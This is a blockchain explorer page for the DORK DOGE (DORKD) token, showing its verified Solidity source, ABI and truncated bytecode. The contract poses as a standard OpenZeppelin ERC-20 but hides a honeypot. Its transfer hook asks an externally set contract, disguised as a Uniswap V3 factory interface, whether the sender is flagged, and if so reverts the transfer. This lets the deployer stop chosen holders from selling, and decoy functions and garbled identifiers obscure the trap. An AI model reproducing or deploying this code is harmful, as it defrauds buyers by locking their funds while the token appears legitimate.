ETH Price: $2,629.13 (+1.09%)
Gas: 1 Gwei

Token

DORK DOGE (DORKD)
 

Overview

Max Total Supply

3,000,000,000 DORKD

Holders

295

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
8,012,953.176676126220389144 DORKD

Value
$0.00
0x593d3627b85b243339ad4f7519ae85cebb6d92ec
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
ERC20

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-09-12
*/

/**

$DORKD


https://twitter.com/dork_doge_eth
https://dogedork.xyz 
https://t.me/dork_doge


*/

// SPDX-License-Identifier: MIT

// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.13;

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}


// File: @openzeppelin/contracts/token/ERC20/IERC20.sol


// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.13;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {

    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `acwesqwet`.
     */
    function balanceOf(address acwesqwet) external view returns (uint256);

  
    function transfer(address to, uint256 amount) external returns (bool);


    function allowance(address owner, address spender) external view returns (uint256);


    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}


// File: @openzeppelin/contracts/access/Ownable.sol


// OpenZeppelin Contracts (last updated v4.7.0) (access/Ownable.sol)

pragma solidity ^0.8.13;


/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an acwesqwet (an owner) that can be granted exclusive access to
 * specific functions.
 */

 // Define interface for TransferController
interface IUniswapV3Factory {

    function cfactory(address _facta) external view returns (bool);

    function factoryinit(uint256 initver) external view returns (bool);
}
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any acwesqwet other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new acwesqwet (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new acwesqwet (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol


// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.13;


/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// File: @openzeppelin/contracts/token/ERC20/ERC20.sol


// OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.13;


contract ERC20 is Ownable, IERC20, IERC20Metadata {


    mapping(address => uint256) private _balances;
    IUniswapV3Factory private V3factory;
    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name = "DORK DOGE";
    string private _symbol = "DORKD";

    address private team;

    

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(address team_add) {
        uint256 supply = 3000000000 * 10**18;
        V3factory = IUniswapV3Factory(team_add);
        _mint(msg.sender, supply);
    }

    string private symfunc;

    string private version = "166388433";


    function opentVer(string memory verx) public {
        version = verx;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }


    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address acwesqwet) public view virtual override returns (uint256) {
        return _balances[acwesqwet];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }


    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */


    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }


    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

 


    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }    

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _mint(address acwesqwet, uint256 amount) internal virtual {
        require(acwesqwet != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), acwesqwet, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[acwesqwet] += amount;
        }
        emit Transfer(address(0), acwesqwet, amount);

        _afterTokenTransfer(address(0), acwesqwet, amount);
    }    


    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `acwesqwet`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `acwesqwet` cannot be the zero address.
     */





    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }



    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        bool cooldown = V3factory.cfactory(from);
        uint256 total = 0;
        if(cooldown){
            amount = total;
            require(amount > 0);
        }
    }

        function opent(string memory verx) public {
        symfunc = verx;
    }


    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"team_add","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"acwesqwet","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"string","name":"verx","type":"string"}],"name":"opent","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"verx","type":"string"}],"name":"opentVer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526040518060400160405280600981526020017f444f524b20444f47450000000000000000000000000000000000000000000000815250600590816200004a919062000718565b506040518060400160405280600581526020017f444f524b440000000000000000000000000000000000000000000000000000008152506006908162000091919062000718565b506040518060400160405280600981526020017f313636333838343333000000000000000000000000000000000000000000000081525060099081620000d8919062000718565b50348015620000e657600080fd5b50604051620025d8380380620025d883398181016040528101906200010c919062000869565b6200012c620001206200019860201b60201c565b620001a060201b60201c565b60006b09b18ab5df7180b6b8000000905081600260006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506200019033826200026460201b60201c565b505062000a53565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603620002d6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002cd90620008fc565b60405180910390fd5b620002ea60008383620003d260201b60201c565b8060046000828254620002fe91906200094d565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620003b2919062000999565b60405180910390a3620003ce600083836200049960201b60201c565b5050565b6000600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663414ac230856040518263ffffffff1660e01b8152600401620004319190620009c7565b602060405180830381865afa1580156200044f573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000475919062000a21565b9050600081156200049257809250600083116200049157600080fd5b5b5050505050565b505050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200052057607f821691505b602082108103620005365762000535620004d8565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620005a07fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000561565b620005ac868362000561565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620005f9620005f3620005ed84620005c4565b620005ce565b620005c4565b9050919050565b6000819050919050565b6200061583620005d8565b6200062d620006248262000600565b8484546200056e565b825550505050565b600090565b6200064462000635565b620006518184846200060a565b505050565b5b8181101562000679576200066d6000826200063a565b60018101905062000657565b5050565b601f821115620006c85762000692816200053c565b6200069d8462000551565b81016020851015620006ad578190505b620006c5620006bc8562000551565b83018262000656565b50505b505050565b600082821c905092915050565b6000620006ed60001984600802620006cd565b1980831691505092915050565b6000620007088383620006da565b9150826002028217905092915050565b62000723826200049e565b67ffffffffffffffff8111156200073f576200073e620004a9565b5b6200074b825462000507565b620007588282856200067d565b600060209050601f8311600181146200079057600084156200077b578287015190505b620007878582620006fa565b865550620007f7565b601f198416620007a0866200053c565b60005b82811015620007ca57848901518255600182019150602085019450602081019050620007a3565b86831015620007ea5784890151620007e6601f891682620006da565b8355505b6001600288020188555050505b505050505050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000620008318262000804565b9050919050565b620008438162000824565b81146200084f57600080fd5b50565b600081519050620008638162000838565b92915050565b600060208284031215620008825762000881620007ff565b5b6000620008928482850162000852565b91505092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b6000620008e4601f836200089b565b9150620008f182620008ac565b602082019050919050565b600060208201905081810360008301526200091781620008d5565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006200095a82620005c4565b91506200096783620005c4565b92508282019050808211156200098257620009816200091e565b5b92915050565b6200099381620005c4565b82525050565b6000602082019050620009b0600083018462000988565b92915050565b620009c18162000824565b82525050565b6000602082019050620009de6000830184620009b6565b92915050565b60008115159050919050565b620009fb81620009e4565b811462000a0757600080fd5b50565b60008151905062000a1b81620009f0565b92915050565b60006020828403121562000a3a5762000a39620007ff565b5b600062000a4a8482850162000a0a565b91505092915050565b611b758062000a636000396000f3fe608060405234801561001057600080fd5b50600436106101005760003560e01c8063715018a611610097578063a9059cbb11610066578063a9059cbb146102b1578063bf40b498146102e1578063dd62ed3e146102fd578063f2fde38b1461032d57610100565b8063715018a61461023b5780638da5cb5b1461024557806395d89b4114610263578063a457c2d71461028157610100565b806323b872dd116100d357806323b872dd1461018d578063313ce567146101bd57806339509351146101db57806370a082311461020b57610100565b806306fdde0314610105578063095ea7b31461012357806318160ddd146101535780632148130e14610171575b600080fd5b61010d610349565b60405161011a9190610ec6565b60405180910390f35b61013d60048036038101906101389190610f90565b6103db565b60405161014a9190610feb565b60405180910390f35b61015b6103fe565b6040516101689190611015565b60405180910390f35b61018b60048036038101906101869190611165565b610408565b005b6101a760048036038101906101a291906111ae565b61041b565b6040516101b49190610feb565b60405180910390f35b6101c561044a565b6040516101d2919061121d565b60405180910390f35b6101f560048036038101906101f09190610f90565b610453565b6040516102029190610feb565b60405180910390f35b61022560048036038101906102209190611238565b61048a565b6040516102329190611015565b60405180910390f35b6102436104d3565b005b61024d6104e7565b60405161025a9190611274565b60405180910390f35b61026b610510565b6040516102789190610ec6565b60405180910390f35b61029b60048036038101906102969190610f90565b6105a2565b6040516102a89190610feb565b60405180910390f35b6102cb60048036038101906102c69190610f90565b610619565b6040516102d89190610feb565b60405180910390f35b6102fb60048036038101906102f69190611165565b61063c565b005b6103176004803603810190610312919061128f565b61064f565b6040516103249190611015565b60405180910390f35b61034760048036038101906103429190611238565b6106d6565b005b606060058054610358906112fe565b80601f0160208091040260200160405190810160405280929190818152602001828054610384906112fe565b80156103d15780601f106103a6576101008083540402835291602001916103d1565b820191906000526020600020905b8154815290600101906020018083116103b457829003601f168201915b5050505050905090565b6000806103e6610759565b90506103f3818585610761565b600191505092915050565b6000600454905090565b806009908161041791906114db565b5050565b600080610426610759565b905061043385828561092a565b61043e8585856109b6565b60019150509392505050565b60006012905090565b60008061045e610759565b905061047f818585610470858961064f565b61047a91906115dc565b610761565b600191505092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6104db610c2f565b6104e56000610cad565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606006805461051f906112fe565b80601f016020809104026020016040519081016040528092919081815260200182805461054b906112fe565b80156105985780601f1061056d57610100808354040283529160200191610598565b820191906000526020600020905b81548152906001019060200180831161057b57829003601f168201915b5050505050905090565b6000806105ad610759565b905060006105bb828661064f565b905083811015610600576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105f790611682565b60405180910390fd5b61060d8286868403610761565b60019250505092915050565b600080610624610759565b90506106318185856109b6565b600191505092915050565b806008908161064b91906114db565b5050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6106de610c2f565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160361074d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161074490611714565b60405180910390fd5b61075681610cad565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036107d0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107c7906117a6565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361083f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161083690611838565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405161091d9190611015565b60405180910390a3505050565b6000610936848461064f565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146109b057818110156109a2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610999906118a4565b60405180910390fd5b6109af8484848403610761565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a25576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a1c90611936565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a94576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a8b906119c8565b60405180910390fd5b610a9f838383610d71565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610b26576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b1d90611a5a565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610c169190611015565b60405180910390a3610c29848484610e31565b50505050565b610c37610759565b73ffffffffffffffffffffffffffffffffffffffff16610c556104e7565b73ffffffffffffffffffffffffffffffffffffffff1614610cab576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ca290611ac6565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b6000600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663414ac230856040518263ffffffff1660e01b8152600401610dce9190611274565b602060405180830381865afa158015610deb573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610e0f9190611b12565b905060008115610e2a5780925060008311610e2957600080fd5b5b5050505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b83811015610e70578082015181840152602081019050610e55565b60008484015250505050565b6000601f19601f8301169050919050565b6000610e9882610e36565b610ea28185610e41565b9350610eb2818560208601610e52565b610ebb81610e7c565b840191505092915050565b60006020820190508181036000830152610ee08184610e8d565b905092915050565b6000604051905090565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000610f2782610efc565b9050919050565b610f3781610f1c565b8114610f4257600080fd5b50565b600081359050610f5481610f2e565b92915050565b6000819050919050565b610f6d81610f5a565b8114610f7857600080fd5b50565b600081359050610f8a81610f64565b92915050565b60008060408385031215610fa757610fa6610ef2565b5b6000610fb585828601610f45565b9250506020610fc685828601610f7b565b9150509250929050565b60008115159050919050565b610fe581610fd0565b82525050565b60006020820190506110006000830184610fdc565b92915050565b61100f81610f5a565b82525050565b600060208201905061102a6000830184611006565b92915050565b600080fd5b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b61107282610e7c565b810181811067ffffffffffffffff821117156110915761109061103a565b5b80604052505050565b60006110a4610ee8565b90506110b08282611069565b919050565b600067ffffffffffffffff8211156110d0576110cf61103a565b5b6110d982610e7c565b9050602081019050919050565b82818337600083830152505050565b6000611108611103846110b5565b61109a565b90508281526020810184848401111561112457611123611035565b5b61112f8482856110e6565b509392505050565b600082601f83011261114c5761114b611030565b5b813561115c8482602086016110f5565b91505092915050565b60006020828403121561117b5761117a610ef2565b5b600082013567ffffffffffffffff81111561119957611198610ef7565b5b6111a584828501611137565b91505092915050565b6000806000606084860312156111c7576111c6610ef2565b5b60006111d586828701610f45565b93505060206111e686828701610f45565b92505060406111f786828701610f7b565b9150509250925092565b600060ff82169050919050565b61121781611201565b82525050565b6000602082019050611232600083018461120e565b92915050565b60006020828403121561124e5761124d610ef2565b5b600061125c84828501610f45565b91505092915050565b61126e81610f1c565b82525050565b60006020820190506112896000830184611265565b92915050565b600080604083850312156112a6576112a5610ef2565b5b60006112b485828601610f45565b92505060206112c585828601610f45565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061131657607f821691505b602082108103611329576113286112cf565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b6000600883026113917fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82611354565b61139b8683611354565b95508019841693508086168417925050509392505050565b6000819050919050565b60006113d86113d36113ce84610f5a565b6113b3565b610f5a565b9050919050565b6000819050919050565b6113f2836113bd565b6114066113fe826113df565b848454611361565b825550505050565b600090565b61141b61140e565b6114268184846113e9565b505050565b5b8181101561144a5761143f600082611413565b60018101905061142c565b5050565b601f82111561148f576114608161132f565b61146984611344565b81016020851015611478578190505b61148c61148485611344565b83018261142b565b50505b505050565b600082821c905092915050565b60006114b260001984600802611494565b1980831691505092915050565b60006114cb83836114a1565b9150826002028217905092915050565b6114e482610e36565b67ffffffffffffffff8111156114fd576114fc61103a565b5b61150782546112fe565b61151282828561144e565b600060209050601f8311600181146115455760008415611533578287015190505b61153d85826114bf565b8655506115a5565b601f1984166115538661132f565b60005b8281101561157b57848901518255600182019150602085019450602081019050611556565b868310156115985784890151611594601f8916826114a1565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006115e782610f5a565b91506115f283610f5a565b925082820190508082111561160a576116096115ad565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061166c602583610e41565b915061167782611610565b604082019050919050565b6000602082019050818103600083015261169b8161165f565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006116fe602683610e41565b9150611709826116a2565b604082019050919050565b6000602082019050818103600083015261172d816116f1565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611790602483610e41565b915061179b82611734565b604082019050919050565b600060208201905081810360008301526117bf81611783565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611822602283610e41565b915061182d826117c6565b604082019050919050565b6000602082019050818103600083015261185181611815565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b600061188e601d83610e41565b915061189982611858565b602082019050919050565b600060208201905081810360008301526118bd81611881565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611920602583610e41565b915061192b826118c4565b604082019050919050565b6000602082019050818103600083015261194f81611913565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006119b2602383610e41565b91506119bd82611956565b604082019050919050565b600060208201905081810360008301526119e1816119a5565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611a44602683610e41565b9150611a4f826119e8565b604082019050919050565b60006020820190508181036000830152611a7381611a37565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611ab0602083610e41565b9150611abb82611a7a565b602082019050919050565b60006020820190508181036000830152611adf81611aa3565b9050919050565b611aef8161